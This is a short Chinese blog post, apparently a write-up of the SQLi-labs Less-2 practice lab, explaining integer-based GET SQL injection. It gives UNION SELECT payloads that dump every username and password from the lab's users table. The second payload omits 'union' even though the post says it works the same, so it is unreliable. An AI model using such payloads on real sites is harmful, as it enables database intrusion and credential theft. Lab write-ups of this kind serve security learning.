码迷,mamicode.com
首页 > 其他好文 > 详细

less-2

时间:2019-12-19 16:11:09      阅读:89      评论:0      收藏:0      [点我收藏+]

标签:去掉   group   有用   技术   oat   users   原因   用户   word   

less 2 是GET整型注入

输入id=1’可以发现跟less-1不一样,这里报错了,而输入id=1可以发现未报错,如下图显示

技术图片

 

 技术图片

 

 

这个原因是因为less-1是字符型的注入,必须作为字符串来处理,而less-2是sql语句对于数字型的数据可以不加单引号。

接着输入id=1 or 1=1,发现可以注入,如下图所示

技术图片

 

 

 

 

 

 

可以注入,接着用和之前相同的方法先报数据库名,然后是表名,接着是字段,最后的payload如下

 

id=-1 union select1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+

技术图片

 

 

还可以去掉char()

输入:

id=-1 select1,group_concat(username),group_concat(password) from users--+

是一样的结果,能显示security数据库下users表的所有用户名和密码

技术图片

less-2

标签:去掉   group   有用   技术   oat   users   原因   用户   word   

原文地址:https://www.cnblogs.com/xixi3/p/12068134.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!